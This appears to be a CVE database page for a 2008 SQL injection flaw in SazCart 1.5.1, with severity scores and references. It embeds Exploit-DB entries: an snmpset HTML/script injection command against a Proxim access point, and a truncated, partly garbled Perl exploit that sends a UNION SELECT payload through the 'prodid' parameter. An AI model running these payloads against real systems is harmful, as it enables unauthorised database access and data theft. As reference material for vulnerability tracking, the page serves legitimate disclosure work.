CVE-2008-2411
published 2008-05-22CVE-2008-2411: SQL injection vulnerability in index.php in SazCart 1.5.1 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL…
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.12%
62.2th percentile
SQL injection vulnerability in index.php in SazCart 1.5.1 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the prodid parameter in a details action.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sazcart | sazcart | <= 1.5 | — |
| sazcart | sazcart | — | — |
| sazcart | sazcart | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection
exploitdb·2008-10-09
CVE-2008-5869 Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection
Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection
---
source: https://www.securityfocus.com/bid/31666/info
The Proxim Tsunami MP.11 2411 Wireless Access Point is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.
Attacker-supplied HTML and script code would run in the context of the web interface of the affected device, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
This issue is reported in the Tsunami MP.11 Model 2411; additional products may also be vulnerable.
$ snmpset -v1 -c public 192.168.1.100 sysName.0 s'">alert(1)'
Exploit-DB
SazCart 1.5.1 - 'prodid' SQL Injection
exploitdb·2008-05-09
CVE-2008-2411 SazCart 1.5.1 - 'prodid' SQL Injection
SazCart 1.5.1 - 'prodid' SQL Injection
---
#!/usr/bin/perl
# SazCart new() or die;
my $go=$cnx->get($victim."?details&prodid=1'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4/*");
if ($go->content =~ m/Price\:(.*?)\<br/ms)
{
print "[+] $1\n\n";
} else {
print "\n[-] exploit failed\n";
}
# milw0rm.com [2008-05-09]
No writeups or analysis indexed.
http://secunia.com/advisories/30148http://securityreason.com/securityalert/3900http://www.securityfocus.com/archive/1/491892/100/0/threadedhttp://www.securityfocus.com/bid/29129https://exchange.xforce.ibmcloud.com/vulnerabilities/42542https://www.exploit-db.com/exploits/5576http://secunia.com/advisories/30148http://securityreason.com/securityalert/3900http://www.securityfocus.com/archive/1/491892/100/0/threadedhttp://www.securityfocus.com/bid/29129https://exchange.xforce.ibmcloud.com/vulnerabilities/42542https://www.exploit-db.com/exploits/5576
2008-05-22
Published